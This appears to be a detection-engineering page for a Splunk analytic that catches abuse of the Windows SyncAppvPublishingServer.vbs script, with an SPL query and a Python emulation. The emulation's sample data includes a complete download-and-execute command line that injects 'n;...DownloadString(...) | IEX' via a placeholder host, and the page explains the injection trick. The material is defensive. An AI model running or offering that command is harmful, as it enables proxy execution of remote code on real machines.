LoFP / False positives may be present if the VBScript SyncAppvPublishingServer.vbs is used for legitimate purposes, such as an App-V client refreshing its publishing server. Filter as needed. Adding "n;" to the command-line match may help reduce noise: the documented abuse passes the script a quoted argument beginning with "n;" so that the rest of the argument is injected into the PowerShell command the script builds, while legitimate invocations do not carry that prefix.

Techniques

Sample rules

Windows System Script Proxy Execution Syncappvpublishingserver

Description

The following analytic identifies abuse of SyncAppvPublishingServer.vbs, a Microsoft-signed script shipped with Windows that can be made to run attacker-supplied PowerShell. Because the script is a trusted proxy for that execution, it may be used to download remote files or to attempt privilege escalation.

Detection logic


| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("wscript.exe","cscript.exe") Processes.process="*syncappvpublishingserver.vbs*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id 
| `drop_dm_object_name(Processes)` 
| `security_content_ctime(firstTime)` 
| `security_content_ctime(lastTime)` 
| `windows_system_script_proxy_execution_syncappvpublishingserver_filter`
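To show what the SPL above actually selects, the following is an added Python re-implementation of the same predicate and grouping, run over a handful of constructed Endpoint.Processes-style events. It is illustrative code written for this page, not part of the Splunk analytic or of LoFP; the hostnames, users, PIDs and the placeholder URL example.invalid are all made up, and the optional "n;" tightening implements the noise-reduction suggestion from the false-positives note.

```python
"""Added example: emulate the SPL detection over constructed sample events."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timezone
import re


@dataclass(frozen=True)
class ProcessEvent:
    """One row of Endpoint.Processes (field names follow the data model)."""
    time: int                  # _time as epoch seconds
    dest: str
    user: str
    parent_process_name: str
    process_name: str
    process: str               # full command line
    process_id: int
    parent_process_id: int


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
TARGET_SCRIPT = "syncappvpublishingserver.vbs"
# The known abuse hands the script a quoted argument that starts with n; so the
# remainder is injected into the PowerShell command the script assembles.
INJECTION_MARKER = re.compile(r'"\s*n;', re.IGNORECASE)


def matches_rule(ev: ProcessEvent, require_injection_marker: bool = False) -> bool:
    """Mirror the tstats WHERE clause; optionally also require the n; prefix."""
    if ev.process_name.lower() not in SCRIPT_HOSTS:
        return False
    if TARGET_SCRIPT not in ev.process.lower():
        return False
    if require_injection_marker and not INJECTION_MARKER.search(ev.process):
        return False
    return True


def ctime(epoch: int) -> str:
    """Stand-in for security_content_ctime: epoch -> UTC timestamp string."""
    return datetime.fromtimestamp(epoch, timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def run_detection(events, require_injection_marker: bool = False):
    """Emulate 'count min(_time) max(_time) ... by <fields>' over matching events."""
    groups = defaultdict(list)
    for ev in events:
        if matches_rule(ev, require_injection_marker):
            key = (ev.dest, ev.user, ev.parent_process_name, ev.process_name,
                   ev.process, ev.process_id, ev.parent_process_id)
            groups[key].append(ev.time)
    rows = []
    for key, times in groups.items():
        dest, user, parent, name, cmdline, pid, ppid = key
        rows.append({
            "dest": dest, "user": user, "parent_process_name": parent,
            "process_name": name, "process": cmdline,
            "process_id": pid, "parent_process_id": ppid,
            "count": len(times),
            "firstTime": ctime(min(times)), "lastTime": ctime(max(times)),
        })
    rows.sort(key=lambda r: (r["firstTime"], r["dest"]))
    return rows


# Constructed sample events (not real telemetry). The first two are the
# documented abuse pattern; the third is a benign-looking sync with no injected
# argument; the fourth is unrelated and should never match.
MALICIOUS_CMD = ('cscript.exe C:\\Windows\\System32\\SyncAppvPublishingServer.vbs '
                 '"n;(New-Object Net.WebClient).DownloadString('
                 "'http://example.invalid/p.ps1') | IEX\"")
SAMPLE_EVENTS = [
    ProcessEvent(1700000000, "WS01", "CORP\\alice", "cmd.exe", "cscript.exe",
                 MALICIOUS_CMD, 4120, 3988),
    ProcessEvent(1700000060, "WS01", "CORP\\alice", "cmd.exe", "cscript.exe",
                 MALICIOUS_CMD, 4120, 3988),
    ProcessEvent(1700000120, "WS02", "NT AUTHORITY\\SYSTEM", "svchost.exe", "wscript.exe",
                 "wscript.exe C:\\Windows\\System32\\SyncAppvPublishingServer.vbs", 2200, 900),
    ProcessEvent(1700000180, "WS01", "CORP\\alice", "explorer.exe", "powershell.exe",
                 "powershell.exe -nop -w hidden", 5000, 1234),
]


if __name__ == "__main__":
    for row in run_detection(SAMPLE_EVENTS):
        print("broad :", row["dest"], row["count"], row["process"][:60])
    for row in run_detection(SAMPLE_EVENTS, require_injection_marker=True):
        print("tight :", row["dest"], row["count"], row["process"][:60])
```

With the broad predicate both the injected and the argument-less invocations surface; adding the "n;" requirement keeps only the injected one, which is the trade-off the false-positives note describes. Events that share the same command line, PID and parent collapse into a single row with a count, exactly as the by-clause in the SPL does.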